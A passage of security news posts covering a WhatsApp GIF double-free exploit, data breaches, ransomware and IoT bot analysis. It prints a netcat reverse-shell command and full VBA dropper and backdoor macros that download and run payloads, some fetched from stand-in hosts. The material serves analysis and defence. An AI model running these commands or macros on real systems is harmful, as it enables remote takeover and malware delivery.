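{
    toy_heap_reset();

    /* First parse: the object and its pixel buffer. */
    GifInfo *first = toy_alloc();
    first->rasterBits = toy_alloc();
    first->rewindFunction = good_rewind;

    /* Cleanup path A frees the buffer ... */
    toy_free(first->rasterBits, fix == 2);
    if (fix == 1)
        first->rasterBits = NULL;          /* decoder-side fix */
    /* ... and cleanup path B frees the same pointer again: the double free. */
    toy_free(first->rasterBits, fix == 2);

    /* Second parse: a fresh GifInfo and a fresh buffer. With the duplicate
     * entry on the free list, both pops return the same block. */
    GifInfo *second = toy_alloc();
    second->rasterBits = toy_alloc();
    second->rewindFunction = good_rewind;
    second->width = 24;
    second->height = 10;

    /* "Decode the first frame": pixel bytes come from the file, so the
     * sender chooses them; 0x41 stands in for that data (constructed). */
    memset(second->rasterBits, 0x41, sizeof(GifInfo));

    /* A real decoder would now call second->rewindFunction(second). If the
     * buffer aliased the object, that pointer is now 0x4141...; here we
     * only inspect it. */
    RewindFn expected = good_rewind;
    return memcmp(&second->rewindFunction, &expected, sizeof expected) != 0;
}

int main(void)
{
    printf("plain allocator, buggy parser : corrupted=%d\n", simulate_gallery(0));
    printf("null-after-free in the parser : corrupted=%d\n", simulate_gallery(1));
    printf("double-free check in allocator: corrupted=%d\n", simulate_gallery(2));
    return 0;
}
```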

The expert was able to craft a GIF file to control the PC register, then he successfully achieved remote code execution by executing the following command:

system("toybox nc 192.168.2.72 4444 | sh");

The expert highlighted that it was not possible to point directly to the system() function in libc.so; instead, it was necessary to first make the PC register jump to an intermediate gadget.

“We need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is not in the scope of this blogpost.” continues the expert. “Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.”

The expert developed the code that was able to generate a corrupted GIF file that could exploit the vulnerability.

notroot@osboxes:~/Desktop/gif$ gcc -o exploit egif_lib.c exploit.c
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit
buffer = 0x7ffc586cd8b0 size = 266

Then he copied the content into a GIF file and sent it as a Document with WhatsApp to another WhatsApp user. The researcher explained that the crafted GIF file could not be sent as a Media file, because WhatsApp attempts to convert it into an MP4 before sending it. The vulnerability is triggered when the target user who has received the malicious GIF file opens the WhatsApp Gallery to send a media file to a friend.

Below are the attack vectors described by the expert:

  1. Local privilege escalation (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in WhatsApp sandbox including message database.
  2. Remote code execution: Pairing with an application that has a remote memory information disclosure vulnerability (e.g. browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send it to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in WhatsApp context.

The exploit works for WhatsApp version 2.19.230 and prior versions; the company addressed the flaw with the release of version 2.19.244.

The exploit works for Android 8.1 and 9.0, but the expert explained that it does not work for Android 8.0 and below.

“In the older Android versions, double-free could still be triggered. However, because of the calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register.” concludes the expert.

Pierluigi Paganini

(SecurityAffairs – WhatsApp, hacking)

The post Expert disclosed details of remote code execution flaw in Whatsapp for Android appeared first on Security Affairs.

Former American Express employee under investigation for customers’ data abuse

Authorities are investigating an American Express employee for unauthorized access to cardholder information and potentially abuse for fraud.

Authorities launched a criminal investigation into an American Express employee who is suspected of having accessed cardholder information and potentially abused it for fraud.

Exposed information includes full name, physical and/or billing address, Social Security numbers, birth dates, and the credit card number.

The suspect is no longer working for the financial organization.

On September 30th, 2019, the financial institution began sending out data breach notifications to the impacted customers; the notice informed them that the former employee potentially used the data for fraudulent activities, including identity theft and financial fraud.

“It was brought to our attention that personal information, related to your American Express Card account listed above, may have been wrongfully accessed by one of our employees in an attempt to conduct fraudulent activity, including potentially opening accounts at other financial institutions.” reads the data breach notification. “In response, we immediately launched an investigation and are fully cooperating with law enforcement agencies to further their investigation.”

American Express is offering free credit monitoring services through Experian Identity Works to impacted customers.

The company also recommends that impacted cardholders monitor their credit reports and statements for any fraudulent activity and report any suspicious activity to their bank.

Pierluigi Paganini

(SecurityAffairs – American Express, cybercrime)

The post Former American Express employee under investigation for customers’ data abuse appeared first on Security Affairs.

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks hit US and Australian hospitals and health service providers causing the paralysis of their systems.

Several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, had limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems impacted at least seven hospitals in Australia. The information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria have been impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory.

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gillette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently, several US cities have suffered ransomware attacks; in August, at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


The post Ten hospitals in Alabama and Australia have been hit with ransomware attacks appeared first on Security Affairs.

Experts found 20 Million tax records for Russian citizens exposed online

Experts discovered an unprotected Elasticsearch cluster containing personally identifiable and tax information of Russian citizens exposed online.

Security experts from Comparitech along with security researcher Bob Diachenko discovered 20 million tax records belonging to Russian citizens exposed online in clear text and without protection.

The experts found an unprotected Elasticsearch cluster containing personally identifiable information on Russian citizens spanning from 2009 to 2016.

“A database of more than 20 million Russian tax records was found on an unsecured server, accessible to anyone with a web browser.” reads the post published by Comparitech.

“Comparitech partnered with security researcher Bob Diachenko to investigate the data exposure, which included sensitive personal and tax information. The database was taken offline after Diachenko notified the owner, who is based in Ukraine.”


The Elasticsearch database was first indexed by search engines in May 2018, Diachenko discovered it on September 17, 2019, and on September 20, 2019 it was secured.

It is not possible to determine whether anyone else accessed the exposed data before Diachenko discovered it. The experts also revealed that the owner is based in Ukraine, but did not disclose its identity.

The cluster included multiple databases, two of which contained tax and personally identifiable information about Russian citizens, mostly from Moscow and the surrounding area.

“The first database contained more than 14 million personal and tax records from 2010 to 2016, and the second included over 6 million from 2009 to 2015.” the experts continue.

Exposed records included the following information:

  • Full name
  • Address
  • Residency status
  • Passport number
  • Phone number
  • Tax ID number
  • Employer name and phone number
  • Tax amount

The exposed data could be used by threat actors to carry out tax scams and fraud.

“Affected individuals could be at risk of identity theft and should monitor their accounts closely. Tax fraud could also be a risk, though our team is not well-versed enough on the topic of the Russian tax system to give concrete advice.” the experts conclude.

“Potential victims should also be on the lookout for targeted phishing and other scams. Fraudsters could pose as tax officials, for example, to steal money or request additional information to aid in identity theft.”

Pierluigi Paganini

(SecurityAffairs – Russian citizens, data leak)

Teheran: U.S. has started ‘Cyber War’ against Iran

Iran’s Passive Defense Organization chief Gholamreza Jalali declared that the US government has started a cyber war against the country.

Gholamreza Jalali, Iran’s Passive Defense Organization chief, announced that “America has started its cyber war against Iran”, without providing further details.

The news was reported by the ISNA news website on October 1; Jalali also added that Iran “decisively will resort to cyber defense.”

Jalali is an Islamic Revolution Guard Corps (IRGC) brigadier general; in November 2018 he announced that government experts had uncovered and neutralized a new strain of Stuxnet.

“Recently we discovered a new generation of Stuxnet which consisted of several parts … and was trying to enter our systems,” Jalali was quoted as saying by the semi-official ISNA news agency at a news conference marking Iran’s civil defense day.

In May, Jalali accused the U.S. of carrying out psyops through social media aimed at influencing Iranians’ sentiment on specific topics. The official also claimed that Iran is targeted by 50,000 cyberattacks and that the country’s cyber defenses suffer eight major attacks annually.

Last week, Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

“it is necessary for all companies and installations of the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears retaliation from Western countries, which accuse it of carrying out physical and cyber attacks against their infrastructure and against countries in the Middle East.

Military and intelligence experts believe that a Western coalition led by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some Western media reported destructive cyber attacks against infrastructure in the Iranian oil sector, but Iran denied it.

Pierluigi Paganini

(SecurityAffairs – Iran, cyberwar)

A new Adwind variant involved in attacks on US petroleum industry

Adwind is back, a new variant of the popular RAT is targeting US petroleum industry entities with new advanced features.

A new variant of the popular Adwind RAT (aka jRAT, AlienSpy, and JSocket) is targeting entities in the US petroleum industry. The new variant implements advanced features such as multi-layer obfuscation. The malware is distributed via a malspam campaign; the spam messages come with malicious attachments or include URLs pointing to malicious content.

“A new campaign spreading the Adwind RAT has been seen in the wild, specifically targeting the petroleum industry in the US. The samples are relatively new and implement multi-layer obfuscation to try to evade detection.” reads the analysis published by NetSkope. “We found multiple RAT samples hosted on the serving domain and spread across multiple directories, all hosted within the last month.”

Adwind is a cross-platform Remote Access Trojan written in Java; it was observed in attacks against aerospace enterprises in Switzerland, Austria, Ukraine, and the US. The Adwind RAT was first discovered in early 2012, when experts dubbed it Frutas RAT; it was later identified under other names: Unrecom RAT (February 2014), AlienSpy (October 2014), and more recently JSocket RAT (June 2015).

Adwind can infect all the major operating systems, including Windows, Mac, Linux, and Android, and it is available in the cybercrime underground under a malware-as-a-service (MaaS) model.

Once the Adwind RAT has infected a computer, it can recruit it into a botnet for several illegal purposes (e.g. DDoS attacks, brute-force attacks).

Experts pointed out that the functionality of the RAT has remained the same as in previous variants; the major change is in the obfuscation technique it implements. The malware delivers its RAT payload via nested JAR archives. Netskope Threat Protection detects the malware as ByteCode-JAVA.Trojan.Kryptik and Gen:Variant.Application.Agentus.1.

“When the victim executes the payload, there are multiple levels of JAR extractions that occur.” continues the analysis.

Netskope researchers discovered 20 malware samples hosted using compromised user accounts of the Australian ISP Westnet.

“The Adwind RAT is a well-known malware family that has actively been used in multiple campaigns over the last couple of years. The samples we analyzed showed that the VirusTotal detection ratio for the top-level JAR was 5/56 while that of the final decrypted JAR was 49/58.” the experts conclude. “These detection ratios indicate that attackers have largely been successful in developing new, innovative obfuscation techniques to evade detection.”

Netskope’s report includes indicators of compromise (IOCs): malware sample hashes for the various JAR payloads used in these attacks, and IP addresses and domains of the C&C infrastructure.

Pierluigi Paganini

(SecurityAffairs – Adwind, malware)

Danish company Demant expects to incur losses of up to $95 million after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that caused serious disruption to its operations; the company has yet to fully recover, a circumstance that suggests it was hit by ransomware.

Demant expects to incur losses of up to $95 million following the incident, which includes a deduction of $14.6 million of expected insurance coverage.

These figures rank among the largest losses ever attributed to a cyber attack.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransomware incident.

“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported Computerworld.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who is a daily employee of IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across the Demant network have not been able to provide their services to end-users regularly.

The impact is predominantly related to the estimated lost sales and to the loss of growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident is significant because it demonstrates the potential impact of a cyber attack on an organization and urges companies to adopt the necessary countermeasures.

The massive NotPetya ransomware attack caused billions of dollars in losses to organizations worldwide; the shipping giant Maersk and the courier service FedEx each incurred over $300 million. In April, the aluminum producer Norsk Hydro estimated the cost of the massive cyber attack that hit the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

Frequent VBA Macros used in Office Malware

The malware expert Marco Ramilli collected a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in cyber attacks.

Nowadays one of the most frequent cybersecurity threats comes from malicious Office documents shipped over email or instant messaging. Some previously analysed examples include: Step By Step Office Dropper Dissection, Spreading CVS Malware over Google, Microsoft Powerpoint as Malware Dropper, MalHIDE, Info Stealing: a New Operation in the Wild, Advanced All in Memory CryptoWorm, etc. Many analyses over the past few years have shown that attackers love to re-use code: they prefer to modify, obfuscate and finally encrypt already known code rather than writing new “attacking modules” from scratch. Hence the idea of collecting a small set of VBA macros widely re-used to “weaponize” Maldocs (malware documents) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Word files are used as droppers. The core concept of a dropper is to download and execute a third-party payload (a second stage), and when you analyse an Office dropper you will often run into many layers of obfuscation. Obfuscation exists to make the analysis harder, but once you get past that stage you will probably see VBA code looking like the following.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to use the ServerXMLHTTP object to download a file from an external resource, save it to a local directory (through the ADODB.Stream object) and finally execute it through the WScript.Shell object. You might find variants of this behaviour: for example, checks on the system language to target specific countries, or checks on an already infected machine, e.g. skipping the network traffic if the file already exists at localPath. A very common way to add such an infection check on the same victim is to add the following condition before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and execute a DLL instead of an external executable. In that case the exported DLL function can be invoked directly from the VBA code, as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running a DLL or an external PE is not the only way to run code on the victim machine: PowerShell can be used as well. A neat way to execute PowerShell without direct access to PowerShell.exe is through its DLLs; thanks to the PowerShdll project this is possible, for example, in the following way.

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    ' Quotes embedded in a VBA string literal must be doubled ("") or the line does not compile
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb ""YouWish"" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Sub


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or, if you have direct access to PowerShell.exe, you might use a simple inline script like the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By combining those techniques (HTTP requests and command execution) you might decide to run commands on the victim machine, effectively having a backdoor. Actually, I did see this code a few times in manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String

' Auto generate at startup
Sub Workbook_Open()
    Main
End Sub

Sub AutoOpen()
    Main
End Sub

Private Sub Main()
    Dim msg As String
    serverUrl = "<<<TEMPLATE>>>"
    msg = "<<<TEMPLATE>>>"
    On Error GoTo byebye
    msg = PlayCmd(msg)
    SendResponse msg
    On Error GoTo 0
byebye:
End Sub

'Send data using http post'
'Note:
'WinHttpRequestOption_SslErrorIgnoreFlags, // 4
' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx'
Private Function HttpPostData(URL As String, data As String)
    'data must have form "var1=value1&var2=value2&var3=value3"'
    Dim objHTTP As Object
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert
    objHTTP.Open "POST", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
    objHTTP.SetTimeouts 2000, 2000, 2000, 2000
    objHTTP.send (data)
    HttpPostData = objHTTP.responseText
End Function

' Returns target ID'
Private Function GetId() As String
    Dim myInfo As String
    Dim myID As String
    myID = Environ("COMPUTERNAME") & " " & Environ("OS")
    GetId = myID
End Function

'To send response for command'
Private Function SendResponse(cmdOutput)
    Dim data As String
    Dim response As String
    data = "id=" & GetId & "&cmdOutput=" & cmdOutput
    SendResponse = HttpPostData(serverUrl, data)
End Function

' Play and return output any command line
Private Function PlayCmd(sCmd As String) As String
    'Run a shell command, returning the output as a string'
    ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility...
    ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows
    Dim instruction As String
    instruction = "cmd.exe /c " & sCmd & " | clip"
    CreateObject("WScript.Shell").Run instruction, 0, True
    ' Read the clipboard text using htmlfile object
    PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text")
End Function

You will probably never see this code exactly as shown here, but you will likely find many similarities with the macros you analyse in your next MalDoc analyses. Just remember that, on the one hand, attackers love to re-use code, but on the other hand they really like to customize it. Keep these stereotypes in mind during your next VBA macro analysis and it will go faster.
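The recurring building blocks described above (an auto-exec entry point, an HTTP client object, an ADODB.Stream write, a WScript.Shell or WMI launch, a certificate-error override) make a useful first triage pass over extracted macro source, before any manual deobfuscation. The script below is an added example, not code from Marco Ramilli's post or from any tool he mentions: the indicator families, regular expressions and verdict labels are my own choices, and the two macro samples it runs over (one shaped like the download-and-execute dropper, one harmless spreadsheet helper) are constructed for the demo. It assumes the VBA source has already been extracted from the document, for instance with olevba from oletools.

```python
"""Triage VBA macro source for the dropper patterns described in the post.

Added example: indicator families, regexes and verdict labels are the
editor's own; the two macro samples below are constructed for the demo.
Extract the VBA source first (e.g. with olevba), then feed it to analyse().
"""
import re

# Each family groups the API names / strings that recur across the droppers
# shown in the post. Matching is case-insensitive because VBA is
# case-insensitive (".send" and ".Send" are the same call).
INDICATORS = {
    "auto_exec":  [r"\bAutoOpen\b", r"\bAuto_Open\b", r"\bWorkbook_Open\b", r"\bDocument_Open\b"],
    "download":   [r"MSXML2\.ServerXMLHTTP", r"WinHttp\.WinHttpRequest", r"\bDownloadFile\b",
                   r"Invoke-WebRequest", r"\.Open\s+\"(GET|POST)\""],
    "write_file": [r"ADODB\.Stream", r"\bSaveToFile\b"],
    "execute":    [r"WScript\.Shell", r"Win32_Process", r"\brundll32(\.exe)?\b",
                   r"\bpowershell\b", r"\bShell\s*\(", r"\bStart-Process\b"],
    # 13056 tells the HTTP object to ignore every server certificate error,
    # so the dropper keeps working against a self-signed or mismatched host.
    "ignore_tls": [r"(setOption\s*\(\s*2\s*\)|Option\s*\(\s*4\s*\))\s*=\s*13056"],
    "recon":      [r"Environ\s*\(\s*\"(COMPUTERNAME|OS|USERNAME)\"\s*\)"],
    "exfil":      [r"ClipboardData", r"\.responseText\b"],
}


def scan_macro(src: str) -> dict:
    """Return {family: sorted matched strings} for every family that fires."""
    hits = {}
    for family, patterns in INDICATORS.items():
        found = {m.group(0) for p in patterns for m in re.finditer(p, src, re.IGNORECASE)}
        if found:
            hits[family] = sorted(found)
    return hits


def classify(hits: dict) -> str:
    """Map the indicator families that fired to a coarse verdict (labels are mine)."""
    if "download" in hits and "execute" in hits:
        return "dropper"            # fetches a second stage and runs it
    if "execute" in hits:
        return "executes-commands"  # launches something, no download seen
    if "download" in hits or "write_file" in hits:
        return "suspicious"
    return "benign-looking"


def analyse(src: str) -> dict:
    """Full triage record for one macro module."""
    hits = scan_macro(src)
    return {
        "verdict": classify(hits),
        "hits": hits,
        "auto_exec": "auto_exec" in hits,   # fires on open without user interaction
        "score": sum(len(v) for v in hits.values()),
    }


# Constructed sample 1: the download-and-execute shape discussed in the post.
SAMPLE_DROPPER = r'''
Sub AutoOpen()
    Dim req As Object, strm As Object
    Set req = CreateObject("MSXML2.ServerXMLHTTP")
    req.setOption(2) = 13056
    req.Open "GET", "https://example.invalid/stage2.bin", False
    req.send
    Set strm = CreateObject("ADODB.Stream")
    strm.Write req.responseBody
    strm.SaveToFile Environ("TEMP") & "\stage2.exe", 2
    CreateObject("WScript.Shell").Run Environ("TEMP") & "\stage2.exe", 0
End Sub
'''

# Constructed sample 2: an ordinary spreadsheet helper with no network or shell use.
SAMPLE_BENIGN = r'''
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
'''

if __name__ == "__main__":
    for name, src in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        r = analyse(src)
        print(f"{name}: verdict={r['verdict']} auto_exec={r['auto_exec']} score={r['score']}")
        for fam, matched in r["hits"].items():
            print(f"  {fam}: {', '.join(matched)}")
```

Plain keyword matching of this kind only works on deobfuscated source: as the post notes, real samples build these strings with concatenation, Chr() calls or custom decoders, so run the scan again after each deobfuscation layer rather than trusting a clean first pass.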


The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have an MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for the US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence centers I’ve ever experienced! Now I technically lead Yoroi defending our customers, strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – VBA macros, Office malware)

Gucci IOT Bot Discovered Targeting European Region

Security Labs discovered a new IoT bot named “GUCCI”. The IoT botnet appears to be named after the Italian luxury brand of fashion and leather goods.

Analysis

The discovery was made during our reconnaissance and intelligence collection process. The IoT threat detection engine picked up the infection IP shown below, which was hosting a number of binaries for different architectures.


Figure 1: GUCCI Bot Binaries

All the binaries were successfully downloaded and their magic headers were analysed to determine the file type. Figure 2 shows how the GUCCI bot binaries are compiled.

Figure 2: Gucci bot compiled binaries

As the output in Figure 2 shows, all the Gucci bot binaries are “stripped”: when they were compiled, the debug symbols were removed from the executables to reduce their size. Listing 1 gives the MD5 hashes of the binaries analysed.

MD5 (arm) = b24e88da025e2e2519a96dd874e6ba8b
MD5 (arm5) = 24ef4178e365c902cfdd53d0ea0d1dc2
MD5 (arm6) = 5a5a27635570b2c3634cab62beadc951
MD5 (arm7) = c1ef67719e9762fc46aeb28a064fe0ae
MD5 (m68k) = 2b984677ab9ee264a2dae90ca994a2a6
MD5 (mips) = a0e0da3ae1ad1b94f0626c3e0cb311ad
MD5 (mpsl) = ee26f791f724f92c02d976b0c774290d
MD5 (ppc) = e16f594cbdd7b82d74f9abc65e0fe677
MD5 (sh4) = a70d246e911fe52638595ea97ed07342
MD5 (spc) = d1b719ab9b7be08ea418b47492108dfa
MD5 (x86) = de94d4718127959a494fe8fbc4aa5b2a
Listing 1: MD5 Hashes of the Gucci Bot Binaries
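As an added illustration (not part of the original SecNiche analysis), the following Python script performs the Listing 1 / Figure 2 triage offline: it parses the ELF identification bytes and the section header table to report the target architecture and endianness (which is how the mips and mpsl builds differ), looks for a symbol table to decide whether the binary is stripped, and computes the MD5. The images it triages are constructed inside the script from bare headers; no real bot binaries are embedded, and the e_machine table covers only the architectures in the listing above.

```python
import hashlib
import struct

# e_machine values from the ELF specification for the targets in Listing 1
# (arm/arm5/arm6/arm7 all use EM_ARM; mips and mpsl differ only in endianness).
E_MACHINE = {
    0x02: "sparc", 0x03: "x86", 0x04: "m68k", 0x08: "mips",
    0x14: "ppc", 0x28: "arm", 0x2A: "sh4", 0x3E: "x86_64",
}
SHT_SYMTAB = 2  # section type of the full symbol table; absent in stripped binaries


def elf_triage(data: bytes) -> dict:
    """Classify an ELF image from its headers only: class, endianness, target
    architecture, whether a symbol table is present, and the MD5 of the file."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    endian = ">" if ei_data == 2 else "<"
    e_machine = struct.unpack_from(endian + "H", data, 0x12)[0]
    if ei_class == 1:  # ELF32: e_shoff at 0x20, e_shentsize/e_shnum at 0x2E
        e_shoff = struct.unpack_from(endian + "I", data, 0x20)[0]
        e_shentsize, e_shnum = struct.unpack_from(endian + "HH", data, 0x2E)
    else:              # ELF64: e_shoff at 0x28, e_shentsize/e_shnum at 0x3A
        if len(data) < 64:
            raise ValueError("truncated ELF64 header")
        e_shoff = struct.unpack_from(endian + "Q", data, 0x28)[0]
        e_shentsize, e_shnum = struct.unpack_from(endian + "HH", data, 0x3A)

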